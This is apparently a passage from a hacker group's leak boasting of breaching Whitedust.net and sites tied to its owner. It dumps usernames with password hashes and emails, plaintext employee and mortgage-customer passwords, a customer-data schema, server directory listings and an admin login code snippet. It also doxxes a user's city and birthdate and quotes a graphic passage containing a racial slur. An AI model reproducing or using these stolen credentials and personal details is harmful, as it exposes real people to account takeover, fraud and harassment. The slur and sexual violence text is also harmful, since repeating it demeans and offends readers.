screv', '4aaad5269c580a6afd8333d73e417b5e', 'screv@hotmail.com',
Xing', '352512781dc959dbefc4972a09506e24', 'xxing66@gmail.com',
myleslong', '667faa4c7d37d34274999baf244b512d', 'myles@cultdeadcow.com',
drraid', 'f2bc5b1d869870d7688f71b2d87030bd', 'drraid@gmail.com',
temp124', '6bf93203ed3bdb7516d0882a27b9758e', 'temp124@kimptongroup.com',
circuit', '63e30cd76dd8fc1d3125fa49c18988f9', 'circuitbomb@flyninja.net',
torpedo', 'f78a580f771c9756b7b6642a87ea68ea', 'torpedo@freeshell.org',
niles', '5297b609864f97c7386aa4adf47e7e40', 'niles@bluebottle.com',
offset', 'fbd1baa2d62ce5761cce36b9e4143c0f', 'offset@ubersecurity.org',
SickMule', '9291e4e9ded00b910290600132ab5406', 'embaumbach@gmail.com',
SupaSaru', 'd0763edaa9d9bd2a9516280e9044d885', 'pockets@techemail.com',
ABitsLife', '807ca4ea007f27f78d1865623bd2bc1e', 'jamesbailey272@yahoo.co.uk',
zinya', '54ccda6d29fed4b41f399682456d715c', 'kitty_84@tiscali.co.uk',
hyper', '6b818a3a6bf1234ed24c940021922b63', 'hyper@hackervoice.co.uk',
MuNk', '5a563b891ee3bafc70344ab3a2576008', 'lordmunk@gmail.com',
Mooseh', 'c80fd33e5eba8563eb1c29fbb543e0b6', 'tom@m33p.com',
welp', '37ec0e14a066d91304fb40f67da664aa', 'welp@01welp.co.uk',
cDc', '28d5cee115ff25080e24caad14451d46', 'webmaster@cultdeadcow.com',
pickle', '18909715fe3d3e416c6201d8d155056a', 'picklejuice@gmail.com',
FutureBSD', 'e494a78ee3a498515f47fd7f13ac1d28', 'FutureBSD@web.de',
hardwire', 'e2a351479a35e2a257f8d5fa4b5a35e0', 'hardwire187@gmail.com',
nrogeist', 'b9bde5159657ac5ff36eebcbb420662a', 'neurogeist@hughes.net',
b00L3an', '38aa067181be3d22d4f73f526661db22', 'b00L3an@gmail.com',
makash', '8b18af3064e5b7db68ed2aa3b0d63aab', 'akashmahajan@gmail.com',
luis', 'b40ff2483ac0286054c67119c6222e3d', 'spiderkid@gmail.com',
xugar', '0e1bf2aa9c4fa6d25f05f843bbd573b1', 'brenodario@terra.com.br',
hash', 'dc551b6164161c85eb4deffa624e2c06', 'carloslnx@gmail.com',
pevnia', '352cc7fb39e725e2ab060958cb3b9c66', 'pevnia@gmain.com',
int3', '89794b621a313bb59eed0d9f0f4e8205', 'rvillordo@gmail.com',
borkedpc', 'ec441f74c2a5cdbef278096c4fc5c1df', 'hakspace@grepmail.com',
LoveLace', 'ca80615d68258e3e4479e08cac47e8d3','troi_delmontes@caribline.com',
ketameme', 'f5fe800fe70bb976241de58d0dc9f61e', 'dx00dx01@gmail.com',
alvaro', '316f9c20b651d17af88735dff86916f4', 'alvaro@yotec.eti.br',
rvltnpwn', 'ed5439d07ea620fc2a664e8df1c78e48', 'revoltingpawn@yahoo.com',
J0rd4n', 'dfabd32b59b03307dd2511eda5c3d357', 'jordan_facey@hotmail.com',
aegis999', '2508afe4c471866d99cf8662a16686e8', 'vgsecur1ty@yahoo.com.sg',
peejay', '2cd6baf8d4fa6ab4a4a0cb758d69b473', 'surrealjason@yahoo.com',
goodboy', 'ceecb8415e84644a7769214c22e94335', 'alexstol@yahoo.com',
BigDog', '13f3252e480b324235375d95c509dcae', 'Cerberus14873@comcast.net',
Gypsie', '38867e6de4a1d8740fb7dc15771086d8', 'jennie313@yahoo.com',
stdin', '57184b0f18edcfa871de8f3bc6d175e6','stdin@electronic-music-alliance.com',
CorpDraco', '9d36a42a36b62b3f665c7fa07f07563b','wolfw1peacekeepers@yahoo.com',
ihustle', '0d107d09f5bbe40cade3de5c71e9e9b7', 'illtype_persona@YAHOO.COM',
kshymkiw', '9bb04f7e14ea008432618c683cf3efe0', 'kshymkiw@gmail.com',
Motogi', '5013c05541fc21b09bb1617be8e76f45', 'Vequoine@yahoo.com',
TMHatr', 'd10096a9193be0834de0be5d516dbd49', 'TMHatr@yahoo.ca',
Hattr', 'd10096a9193be0834de0be5d516dbd49', 'tmhatr@gmail.com',
Viraj21', '5fcfd41e547a12215b173ff47fdd3739', 'viraj_slk@yahoo.com',
mangler', 'cb74b9adcc2641eba78830342f94a56c', 'jasonmori@gmail.com',
red22', '0c8b042e41600534af1672799e445775', 'm4n2a0@hotmail.com',
duckster', '83166cdeb7a2d9c1d591ad9d4eff4204', 'nwhere@gmail.com',
amigo', '42a3761e9aef7a2fe81295099c289a93', 'amy@hackinthebox.org',
serif', '8eb650bbdd292c5c69a0659d9209b630', 'morgan@datalinkcontrol.net',
cr0w_', 'f22ca7296a624acf877c519c07e8767f', 'kyougu@gmail.com',
Drew00013', '0213a9cd31784ba9eb69ae2536dc5f46', 'drewmayes@gmail.com',
Aranje', '184bcaee3f7cc6f1af70de93dc8e5b50', 'orangewinds@gmail.com',
10nix', '1ab1bf6d0a6f97e2cc71fe755c2336dc', '10nix@hackervoice.co.uk',
md5', '26fe0cdfe99bfa306e31733c4e2b17dc', 'md5pass@googlemail.com',
4ssembler', 'ab1c0c12bfef99600bbc1f3478595f11', 'gruberjl@gmail.com',
Stumbler', '900ae31a3ae38757c4b98e654dd34591', 'uppman421@yahoo.com',
verbal', 'f56fdc49bbc079923c1dd913c5d1f717', 'verbal@smashedstacks.net',
gloomer', '1e5e95662da0bf42ce2f0d5c7f0f662e', 'yo_muffinman@hotmail.com',
melphos', 'a9da0784806d18af545e35836a2e1933', 'melphos@gmail.com',
righty', 'd73e4cf8fe7ddf288c851bf25a27427c', 'rightcoast@gmail.com',
Blade', 'cf0d151dd4cffefec01d59f38afd8e94', 'badeofblade@gmail.com',
l33t_tj', 'aae039d6aa239cfc121357a825210fa3', 'eggs@valornet.com',
Zal91', '4200e078b8271c31caa0e3a62f8f9a55', 'zal91@bellsouth.net',
hrddrv', '177976c88914552313ee72714091c322', 'hrddrv@gmail.com',
augur', '20809d7552636da83619561ad6279910', 'augurkun@gmail.com',
Chimaera', '51a87efefcd6396b6dfffeaf34ecd93d', 'darkshadow1990@gmail.com',
hm', '9aa6e5f2256c17d2d430b100032b997c', 'gailandlala@yahoo.com',
kenetik', '4585cc4a2cda77e54f2f2605834d61be', 'kenetik@bitbiters.net',
PeterB', '62bacf83093312d1a55d79831905afc9', 'petersgame@msn.com',
Tweek888', '008fcaa51c412a6ae71be1487e1f4332', 'tweekdisagrees@gmail.com',
phoenix69', '6632511cd5ba03bc07d045474312a2f2', 'greatgt69@yahoo.co.uk',
mrbarcode', 'd8c930a5017c1d94541da5032d5c650e', 'cowboyninja@gmail.com',
matt', 'f69022ec2e397b8ac97be517f9fd8963', 'mattzab@gmail.com',
Drksrc', '893687aeba0744ec2de5099a3b97bfb1', 'jcoyle@winwholesale.com',
think', '8fc52b933532f9a4b83206ea5fd0d6c2', 'think_666@yahoo.com',
goodguy', '742d4b305e59c8113f38eb0df12f7720', 'gooddeed89@gmail.com',
Trikk', '43024376b023da494e94f5799e75b1c7', 'tech7com@gmail.com',
misterhak', '1b5f33fc105525d843fa5665bc5d87d7','pinoyclan_community@yahoo.com',
MacCool', 'ea5a2ba944083bbb4bb4dcab6e6daf3c', 'maccool71@gmail.com',
Hackmo', 'f8b9ed2d08bb3c5bbeeca79485eb1a7f', 'hackmo@gmail.com',
iod3k', '71e2ddf172d36e8346cc3763e1cedb9c', 'iod3k@yahoo.com',
iod4k', '4d4ac2e5f40c9c25ffe05a05508a519c', 'ineffabilis@hotmail.com',
vfrtgb', 'e22a63fb76874c99488435f26b117e37', 'vfrtgb@mailinator.com',
rage', 'c4ee146a878e9c065b045707915e9c99', 'rage@iamrage.com', <-- angry
revebo', 'fc7e987f23de5bd6562b7c0063cad659', 'byronsmart@gmail.com',
Whitedust', 'e7e9f43efcb7f72bca72aad5b79b7847', 'admin@whitedust.net',
rexroof', '3aa7433f52c6fadba8a950256c36a0de', 'hakspace@rexroof.com',
dthis', '22ec7a3e97bcb747bad69af1e21e02ea', 'decypherthis@gmail.com',
bobbie', '1ac0d72d238c86b2029c8419ba2574a2','theangelsprostitute@kittymail.com',
Hippie', 'f7baeca263d193cfe02ac27ef2993709', 'Noellelovelle@gmail.com',
Moregan', '622cd4323272472ebac51f8a0b04a858', 'moregan@gmail.com',
pewp', 'fb52eacf3758541ca36918e8f46bd394', 'pewp@pewp.hack.se', <-- sucker
thehive', '87ab1091dadc85902209dee3019cebcd', 'jhammant@gmail.com',
cyber_eagle', 'dc63bf106a5f21e436a799565e638ff6','cybereagle@hackerslegion.com',
Ll0yd', 'd1130289b1ea13a6b48153a0148974d1', 'tiggur@tiscali.co.uk',
kim', '824d431874368f9b4a33ff61b45781cc', 'kimholland@gmail.com',
krisgesling', '702cc6ea8896531338876af10ed95a17', 'krisgesling@gmail.com',
xof7', 'da6fa909f1c0188c539feb08d4496eb7', 'webtime7@gmail.com',
Cookymonsta', '5225fb1447edfac6f38e70b09cf8868f','turningpointteam@hotmail.com',
ostmovid', 'd629b54c84af88118c662c6e211dbf1e', 'ostmovid@online.no',
14', 'cc33c66b6365f1e37f9523871b837dfe', 'c-14@hackermail.com',
snper12345', '1b98f582482d8143cb0d68e048ea6a8f', 'm81a1@sbcglobal.net',
siputsub', '143796d703e154dbfe669726743b5ee1', 'siputsub@yahoo.com',
ir0xor', '7bdfd5e45b559e2d7819b61dcd308f04', 'one_two_play@hotmail.com',
englishpete', '870e83e084682a2269683929d77ddf8b', 'home@peterbassill.com',
bigguns', '161ebd7d45089b3446ee4e0d86dbcf92', 'bblacklidge@gmail.com',
mjve', 'c888ff51aaaa5e992ef6559f2857d692', 'michaelvanes01@hotmail.com',
picturetaker', '5456fc54c74a297ce994998c2873b370','thisisanfieldxlfc@gmail.com',
Trikk', '43024376b023da494e94f5799e75b1c7', 'tech7com@gmail.com',
misterhak', '1b5f33fc105525d843fa5665bc5d87d7','pinoyclan_community@yahoo.com',
Large', 'c0439fbd53e21ac559d9b0851d0fc439', 'olargeone@gmail.com',
Paris_Hilton', 'e7e9f43efcb7f72bca72aad5b79b7847', 'paris@hilton.com',
gilvicente21', 'e6dd959ca0aa820fb118e248162c5c78','gil_vicente2003@hotmail.com',
Bugs', 'a49b2617faf7603c958606ba876496e9', 'sendai78@gmail.com',
syeldan', 'efe6398127928f1b2e9ef3207fb82663', 'syeldan4@yahoo.de',
mrbungle', '7f53bffd5ead2b36e0f4079d9def8467', 'mizika@gmail.com',
crocodile033', 'c263845d7f4d3395111310792cba78ac','crocodile033@gmail.com',
2old4this', '05f596d647b883159adaf1414688d4f6','londonboyz_786uk@yahoo.co.uk',
Spown', 'eedf39d2f48a0782e85f4d93d2c66b30', 'Ptichka_oksana@yahoo.ca',
tyriekm', '276f8db0b86edaa7fc805516c852c889', 'tyriekm@gmail.com',
aboyandhisrobot', 'f9226917601f102a9094afcbf8b73083','ben@photophobic.net',
treo411', '37b4e2d82900d5e94b8da524fbeb33c0', 'treo411@yahoo.ca',
piis8', 'cd82b6746062668f56b3467f7592f5be', 'piis8@yahoo.com',
signius', '59fde0822a4c110a8269dbf40e56989d', 'darren@signius.co.uk',
PriMeZ', 'a93d8ff406dadba858ce749505da96ce', 'tenthmaelstrom@gmai.com',
PriMeZzZ', 'a93d8ff406dadba858ce749505da96ce', 'tenthmaelstrom@gmail.com',
happy_coder', '275f5d945012ffa70f2bf5c076af18f2','amr_hisham@hotmail.com',
Check out this hilarious dogshit Introduction to Whitedust:
Having firmly established ourselves as the leading independent security
news portal, Whitedust is now the leading distributor of timely and
current
unbias security news. As we push past our 1st anniversary, Whitedust will
capture the attention of an even larger readership by maintaining our uniq
ue tradition of reporting the news as it happens, not when it suits us.
Confessions REVEALED
INSERT INTO `phpizabi_confess`(`id`, `date`, `body`, `user`) VALUES ('16',
'1176746880', 'I have not found an XSS exploit yet :(', '39');
INSERT INTO `phpizabi_confess`(`id`, `date`, `body`, `user`) VALUES ('28',
'1176849651', 'i...i... ime sorry, i program in VB
/me runs nd cries', '93');
INSERT INTO `phpizabi_confess`(`id`, `date`, `body`, `user`) VALUES ('35',
'1176920362', 'When I see IBM servers I touch myself....', '108');
INSERT INTO `phpizabi_confess`(`id`, `date`, `body`, `user`) VALUES ('38',
'1177020530', 'I split a nigga between the eyes with my dick while his ha
nds where bound behind his back; I then blind folded him and thrust
it into his ass without lubrication.
It hurt at first; but we both began to enjoy it near the end.',
'40');
INSERT INTO `phpizabi_confess`(`id`, `date`, `body`, `user`) VALUES ('44',
'1177290307', 'I used to steal credit cards, then blame it on my friends.
.', '68');
INSERT INTO `phpizabi_confess`(`id`, `date`, `body`, `user`) VALUES ('46',
'1177577300', 'I love ponies and goatsex.', '153');
INSERT INTO `phpizabi_confess`(`id`, `date`, `body`, `user`) VALUES ('50',
'1177689335', 'i pick my nose and have no idea how to crack a network. I
just have some random knowledge of shit and know how to use a few tools
rofl', '158');
INSERT INTO `phpizabi_confess`(`id`, `date`, `body`, `user`) VALUES ('54',
'1177856945', 'I too like bukkake.', '1');
INSERT INTO `phpizabi_confess`(`id`, `date`, `body`, `user`) VALUES ('70',
'1178905963', 'One time, at band camp, I ate a ham sandwich. And by ham s
andwich, I mean a raccoon.', '20');
INSERT INTO `phpizabi_confess`(`id`, `date`, `body`, `user`) VALUES ('72',
'1179152367', 'Sometimes, I piss myself.', '112');
USER:Nick
39:DaMacc
93:screv
108:n00dles
40:LiX <- lix@valvesoftware.co.uk That's what they do at valve.
68:Zakolus <- watch out kid, now the police will be after you. Too bad
they know you live in Murfreesboro, Tennesse and that your birthday is
6/12/1989, huh.
153:cr0w_
158:4ssembler
1:psg
20:Ender
112:cDc <- haha webmaster@cultdeadcow.com pisses himself. No surprise
OK enough lame hakspace stuff. We figured it wasn't even worth logging
unless we couldn't find a quicker way to own WD. Either way it got defaced
immediately.
==endofdayz.net
End of Dayz is the name of the stupid book that psg decided to put
together. We owned this site. Well, there really isn't much to own: check
out some ls:
$ ls
banner.png cgi-bin countdown.js cover.jpg favicon.ico index.php
pressrelease.php psg reviews.php symbol.jpg video.php
$ ls cgi-bin/
$ ls psg/
EveInstaller-cracked.exe.torrent cdc-lappy-2.jpg dsc02535.jpg
dsc02538.jpg dsc02541.jpg garyftw.jpg massheart.jpg
psghadyourmum.png
MAC_jon.jpg dsc02533.jpg dsc02536.jpg
dsc02539.jpg eve k.txt pan.jpg
cdc-lappy-1.jpg dsc02534.jpg dsc02537.jpg
dsc02540.jpg freeparis.png mac-suck.png psg-cdc2.jpg
$
Notice garyftw.jpg. psg actually kept 42MB of videos of Gary McKinnon over
on whitedust.net
Feel free to steal psg's lame pictures.
==celbridge4u.com
Another website that Mark Anderson owns. Again, not much for us to pwn.
$ ls
Business_Plan_Draft_1_18.01.07-_Celbridge___District_Network.pdf
LAUNCH ANNOUNCEMENT DOCUMENT.pdf index.html
Celb[1][1]._&_District_Questionnaire._Draft1.pdf
celebridge_network2.jpg
Celbridge and District BusinessNetwork registration form (3)-22.02.07.pdf
cgi-bin
$ ls cgi-bin/
$
==kildarebiz.com
$ ls
cgi-bin dev
$ ls cgi-bin/
$ ls dev/
captchaimg.php forcelogin.php forcelogout.php includes index.php
inkadmin log templates viewdocument.php
$ ls dev/includes/
cDatabase.php cLog.php cTemplate.php components conf.php
functions.php
$ ls dev/includes/components/
ContactForm.php NewSignups.php Poll.php Referral.php
Signup.php StaffSignup.php
DropdownNavigation.php NewsBrowser.php PollDisplay.php
RelatedNews.php SiteMap.php Textbox.php
KildareNav.php PauseScroller.php RandomQuote.php Search.php
SpecialOffer.php
$ ls dev/inkadmin/
clearorphans.php documents.php howto.php logs.php
openwysiwyg.zip users.php
components.php editglobalelement.php images navigation.php
setglobalelement.php
configpageelement.php editpageelement.php index.php notes.php
setpageelement.php
$ head -25 dev/inkadmin/howto.php
<?
// ink admin page - copyright 2007 Mark Anderson
include '../includes/conf.php';
include '../includes/cLog.php';
include '../includes/cDatabase.php';
include '../includes/cTemplate.php';
$log = new cLog;
$db = new cDatabase;
//do login
if ($_REQUEST['loginUsername'] != "") {
$username = $db->escape ($_REQUEST['loginUsername']);
$password = $db->escape ($_REQUEST['loginPassword']);
$query = $db->query("select UserID, Password, RealName, Email,
GroupID, AdminFlag from ink_users where (Username = '$username' and
AdminFlag = 1)");
$r = $db->fetch_array($query);
$dbpassword = $r['Password'];
if ($password == $dbpassword) {
$_SESSION['Username'] = $username;
$_SESSION['UserID'] = $r['UserID'];
$_SESSION['RealName'] = $r['RealName'];
$_SESSION['Email'] = $r['Email'];
}
}
$ ls dev/log/
log.txt
$ ls dev/templates/
AmiJS.js greybox.css home-clane.htm images
openwysiwyg subpage-clane.htm
blankpage.htm greybox.js home-maynooth.htm kildarebiz.css
staffpage.htm subpage-maynooth.htm
companypage.htm home-celbridge.htm home.htm kildarebiz.js
subpage-celbridge.htm subpage.htm
$
Mark Anderson is very bad at everything he does, including webdesign. In
this case there is a ton of code reuse and css reuse. Poor poor Mark. He's
not a hacker, he's not even a PHP coder.
==www.irelandmortgages.com
Another poor attempt by Anderson to get in on making money.
We didn't actually know that he worked for this company. When did we find
out, you ask? Well, we answer, we found out when we were reading the
database for whitedust.net (omg spoiler: Whitedust is coming!). Anderson
felt it was wise to include absolutely all of their data in the same
database as whitedust.net uses.
We think it is important for the customers of www.irelandmortgages.com
(don't forget the www lawl) to know the stupidity of the people they are
trusting money and information with.
A great sign of poor management is when you try to go to the website
without a 'www' and this is what you see:
Warning: mysql_connect() [function.mysql-connect]: Access denied for user
'apache'@'localhost' (using password: NO) in
/home/steps2home/domains/irelandmortgages.com/public_html/ink/includes/cDa
tabase.php on line 46
Could not connect: Access denied for user 'apache'@'localhost' (using
password: NO)
In case you were wondering about passwords, here they are:
INSERT INTO `im2_users` VALUES (1, 'mark', 'landl0rd', 'Mark Anderson',
'me@markanderson.ie', 0);
INSERT INTO `im2_users` VALUES (14, 'brendan', 'brendan', 'Brendan Kelly',
'info@irelandmortgages.com', 0);
INSERT INTO `im2_users` VALUES (17, 'Eileen', 'rachel8', 'Eileen Egan',
'Eileen@irelandmortgages.com', 0);
INSERT INTO `im2_users` VALUES (26, 'jean@irelandmortgages.com', 'Oisin',
'Jean Boyle', 'jean@irelandmortgages.com', 0);
We didn't actually ask Mark why he chose such a password (and feels so
strongly about using it elsewhere), but if we did this might have been his
response:
<Cronus> The 0 is for 0wned.
The database is horrendous, it has hundreds of lines that look like this:
INSERT INTO `im2_appform3` VALUES (406, '', '', '', '', '', '', '', '',
'', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '
', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '',
'', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', ''
, '', '', '', '', '', '', '', '');
In case you wondered, there are eight appforms. I think they actually
differ by a couple of extra fields.
We have a ton of info on any www.irelandmortgages.com customers. Here is a
small idea of what we may have:
CREATE TABLE `im2_clientenquiryform` (
`ClientID` bigint(30) NOT NULL default '0',
`ApplicationType` varchar(100) NOT NULL default '',
`A1_Name` varchar(100) NOT NULL default '',
`A2_Name` varchar(100) NOT NULL default '',
`A1_Address` varchar(255) NOT NULL default '',
`A2_Address` varchar(255) NOT NULL default '',
`A1_DOB` date NOT NULL default '0000-00-00',
`A2_DOB` date NOT NULL default '0000-00-00',
`A1_DaytimeNumber` varchar(100) NOT NULL default '',
`A2_DaytimeNumber` varchar(100) NOT NULL default '',
`A1_MobileNumber` varchar(100) NOT NULL default '',
`A2_MobileNumber` varchar(100) NOT NULL default '',
`A1_Email` varchar(100) NOT NULL default '',
`A2_Email` varchar(100) NOT NULL default '',
`A1_Occupation` varchar(100) NOT NULL default '',
`A2_Occupation` varchar(100) NOT NULL default '',
`A1_EmploymentStatus` varchar(100) NOT NULL default '',
`A2_EmploymentStatus` varchar(100) NOT NULL default '',
`A1_EmployersName` varchar(100) NOT NULL default '',
`A2_EmployersName` varchar(100) NOT NULL default '',
`A1_BasicSalary` varchar(100) NOT NULL default '',
`A2_BasicSalary` varchar(100) NOT NULL default '',
`A1_Overtime` varchar(100) NOT NULL default '',
`A2_Overtime` varchar(100) NOT NULL default '',
`A1_OvertimeFreq` varchar(100) NOT NULL default '',
`A2_OvertimeFreq` varchar(100) NOT NULL default '',
`A1_Bonus` varchar(100) NOT NULL default '',
`A2_Bonus` varchar(100) NOT NULL default '',
`A1_BonusFreq` varchar(100) NOT NULL default '',
`A2_BonusFreq` varchar(100) NOT NULL default '',
`A1_Commission` varchar(100) NOT NULL default '',
`A2_Commission` varchar(100) NOT NULL default '',
`A1_CommissionFreq` varchar(100) NOT NULL default '',
`A2_CommissionFreq` varchar(100) NOT NULL default '',
`PurchasePrice` varchar(100) NOT NULL default '',
`LoanRequired` varchar(100) NOT NULL default '',
`Term` varchar(100) NOT NULL default '',
`Rate` varchar(100) NOT NULL default '',
`A1_Lender1` varchar(100) NOT NULL default '',
`A2_Lender1` varchar(100) NOT NULL default '',
`A1_LoanPurpose1` varchar(100) NOT NULL default '',
`A2_LoanPurpose1` varchar(100) NOT NULL default '',
`A1_LoanBalance1` varchar(100) NOT NULL default '',
`A2_LoanBalance1` varchar(100) NOT NULL default '',
`A1_LoanRepayment1` varchar(100) NOT NULL default '',
`A2_LoanRepayment1` varchar(100) NOT NULL default '',
`A1_Lender2` varchar(100) NOT NULL default '',
`A2_Lender2` varchar(100) NOT NULL default '',
`A1_LoanPurpose2` varchar(100) NOT NULL default '',
`A2_LoanPurpose2` varchar(100) NOT NULL default '',
`A1_LoanBalance2` varchar(100) NOT NULL default '',
`A2_LoanBalance2` varchar(100) NOT NULL default '',
`A1_LoanRepayment2` varchar(100) NOT NULL default '',
`A2_LoanRepayment2` varchar(100) NOT NULL default '',
`A1_Lender3` varchar(100) NOT NULL default '',
`A2_Lender3` varchar(100) NOT NULL default '',
`A1_LoanPurpose3` varchar(100) NOT NULL default '',
`A2_LoanPurpose3` varchar(100) NOT NULL default '',
`A1_LoanBalance3` varchar(100) NOT NULL default '',
`A2_LoanBalance3` varchar(100) NOT NULL default '',
`A1_LoanRepayment3` varchar(100) NOT NULL default '',
`A2_LoanRepayment3` varchar(100) NOT NULL default '',
`A1_SavingsAccount1` varchar(100) NOT NULL default '',
`A2_SavingsAccount1` varchar(100) NOT NULL default '',
`A1_SavingsAccount2` varchar(100) NOT NULL default '',
`A2_SavingsAccount2` varchar(100) NOT NULL default '',
`A1_Category` varchar(100) NOT NULL default '',
`A2_Category` varchar(100) NOT NULL default '',
`A1_ValueExisting` varchar(100) NOT NULL default '',
`A2_ValueExisting` varchar(100) NOT NULL default '',
`A1_MortgageBalanceOutstanding` varchar(100) NOT NULL default '',
`A2_MortgageBalanceOutstanding` varchar(100) NOT NULL default '',
`A1_ExistingLender` varchar(100) NOT NULL default '',
`A2_ExistingLender` varchar(100) NOT NULL default '',
`A1_LoansToBeRefinanced` varchar(100) NOT NULL default '',
`A2_LoansToBeRefinanced` varchar(100) NOT NULL default '',
`A1_PotentialRentalIncome` varchar(100) NOT NULL default '',
`A2_PotentialRentalIncome` varchar(100) NOT NULL default '',
`FoundHouse` varchar(10) NOT NULL default '',
`AddressNewHouse` varchar(255) NOT NULL default '',
`PaidBookingDeposit` varchar(10) NOT NULL default '',
`WouldLikeConsultation` varchar(10) NOT NULL default '',
`DesiredDate` varchar(100) NOT NULL default '',
`DesiredTime` varchar(100) NOT NULL default '',
`HeardAbout` varchar(255) NOT NULL default '',
`Comments` varchar(255) NOT NULL default '',
`RequireSolicitor` varchar(10) NOT NULL default '',
`RequireSnagger` varchar(10) NOT NULL default '',
`Step` varchar(100) NOT NULL default '',
`StepNumber` int(10) NOT NULL default '0',
`StatusText` varchar(255) NOT NULL default '',
`LastAccess` timestamp NOT NULL default CURRENT_TIMESTAMP on update
CURRENT_TIMESTAMP,
`ClosingDate` date NOT NULL default '0000-00-00',
`MiscText` varchar(255) NOT NULL default '',
`Date` varchar(100) NOT NULL default '',
`MortgageRefNo` varchar(100) NOT NULL default '',
`LifeCompanyPolicyNumber` varchar(100) NOT NULL default '',
PRIMARY KEY (`ClientID`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
And you may find this interesting:
CREATE TABLE `im2_clientlogin` (
`ID` bigint(30) NOT NULL auto_increment,
`Email` varchar(255) NOT NULL default '',
`Password` varchar(255) NOT NULL default '',
`Locked` tinyint(2) NOT NULL default '0',
PRIMARY KEY (`ID`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=415 ;
--
-- Dumping data for table `im2_clientlogin`
--
INSERT INTO `im2_clientlogin` VALUES (120, 'ciaran.oreilly@gmail.com',
'moreput', 0);
INSERT INTO `im2_clientlogin` VALUES (205, 'scott.wishart@intel.com',
'mostmay', 0);
INSERT INTO `im2_clientlogin` VALUES (211, 'scott.wishart@intel.com',
'dayworld', 0);
INSERT INTO `im2_clientlogin` VALUES (184, 'scott.wishart@intel.com',
'beenanother', 0);
INSERT INTO `im2_clientlogin` VALUES (145, 'Niall.Carroll@hilton.com',
'whothere', 0);
INSERT INTO `im2_clientlogin` VALUES (174, 'victoria.vogel@marine.ie',
'therethe', 0);
INSERT INTO `im2_clientlogin` VALUES (144, 'jonathan.mcevoy@intel.com',
'beenlast', 0);
INSERT INTO `im2_clientlogin` VALUES (118,
'brendan:@irelandmortgages.com', 'andhow', 0);
INSERT INTO `im2_clientlogin` VALUES (129, 'ciaran.oreilly@gmail.com',
'saidshow', 0);
INSERT INTO `im2_clientlogin` VALUES (116, 'emma-keanr@hotmail.com',
'forcan', 0);
INSERT INTO `im2_clientlogin` VALUES (117, 'ciaran.oreilly@gmail.com',
'madethen', 0);
INSERT INTO `im2_clientlogin` VALUES (261, 'scott.wishart@intel.com',
'threesound', 0);
INSERT INTO `im2_clientlogin` VALUES (182, 'scott.wishart@intel.com',
'othertake', 0);
INSERT INTO `im2_clientlogin` VALUES (132, 'info@irelandmortgages.com',
'partfor', 0);
INSERT INTO `im2_clientlogin` VALUES (185, 'brucecrehan@yahoo.com',
'threeeven', 0);
INSERT INTO `im2_clientlogin` VALUES (135, 'ciaran.oreilly@gmail.com',
'rightcan', 0);
INSERT INTO `im2_clientlogin` VALUES (136, 'eimeardawson@iname.com',
'whilenow', 0);
INSERT INTO `im2_clientlogin` VALUES (137, 'scott.wishart@intel.com',
'numberwho', 0);
INSERT INTO `im2_clientlogin` VALUES (369, 'geoff@wildcard.ie',
'showread', 0);
INSERT INTO `im2_clientlogin` VALUES (243, 'scott.wishart@intel.com',
'throughtwo', 0);
INSERT INTO `im2_clientlogin` VALUES (158, 'jonathan.mcevoy@intel.com',
'useway', 0);
INSERT INTO `im2_clientlogin` VALUES (141, 'a.brown@frkelly.ie',
'everyfew', 0);
INSERT INTO `im2_clientlogin` VALUES (142, 'jonathan.mcevoy@intel.com',
'smallsmall', 0);
INSERT INTO `im2_clientlogin` VALUES (143,
'anthony.dunne@prioneerinvestment.ie', 'shethrough', 0);
INSERT INTO `im2_clientlogin` VALUES (183, 'brucecrehan@yahoo.com',
'helpold', 0);
INSERT INTO `im2_clientlogin` VALUES (257, 'scott.wishart@intel.com',
'whereaway', 0);
INSERT INTO `im2_clientlogin` VALUES (150,
'james.donnelly@ulsterbank.com', 'whereman', 0);
INSERT INTO `im2_clientlogin` VALUES (344, 'yasinx.ali@intel.com',
'suchwas', 0);
INSERT INTO `im2_clientlogin` VALUES (323, 'ndunne06@hotmail.com',
'helpsame', 0);
INSERT INTO `im2_clientlogin` VALUES (157, 'miceal.f.mcevoy@intel.com',
'airmay', 0);
INSERT INTO `im2_clientlogin` VALUES (219, 'scott.wishart@intel.com',
'putwork', 0);
INSERT INTO `im2_clientlogin` VALUES (250, 'scott.wishart@intel.com',
'dayaway', 0);
INSERT INTO `im2_clientlogin` VALUES (162, 'Patrick.Power@daiwasectab.ie',
'nameshow', 0);
(Rest of list cutoff: Pointless).
Watch them keep up to date on your properties:
INSERT INTO `im2_finalvaluation` VALUES (294, '', '', '', '', '', '', '',
'', '', '', '', '', '', '');
(Almost the entire table looks like that)
On all of the clients, we have this kind of information:
INSERT INTO `im2_overview` VALUES (221, '', '', 'Client already owns a PDH
and an Investment property in celbridged valued at 700k with a sma
ll mortgage oustanding on PDH. Current mortgage with Irish Nationwide.
Requires 100k to buy 2 sites in limerick and will cross secure with
existing properties', '', '', '', '', '', '', '', '', '', '', '', '13',
'', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '
', '', '', '', '', '', '', '', '');
and this kind of information!
INSERT INTO `im2_overview2` VALUES (229, '', '', '', '', '', '', '', '',
'', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '',
'', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '',
'', '', '', '', '', '', '', '', '', '', '', '', '', '');
and of course the classic:
INSERT INTO `im2_overview3` VALUES (401, '', '', '', '', '', '', '', '',
'', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '',
'', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '',
'', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '
');
Of course, anything they have ever done with their customers is stored in
this db. Like so:
INSERT INTO `im2_salestasks` VALUES (297, 0, '', '1150070461', 'Followup
with Sean White (get him to contact his doctor re PMA report (go bac
k to Paul in Eagle Star)', 1, 1, '12', '6', '2006', 'Brendan Kelly');
Customers need to ask themselves some question.
1. Why does the owner use his first name as a password?
2. Why does the coder use the same password as he uses elsewhere?
3. Why do none of the four employees use a password longer than eight
characters?
4. Why are we employing a coder who pretends to be a hacker in his spare
time?
5. Why is our database being stored with the database of a site that has
been publicly targetted by hackers?
6. Why are these passwords not hashed?
7. What kind of lame hack wrote this site and designed this database?
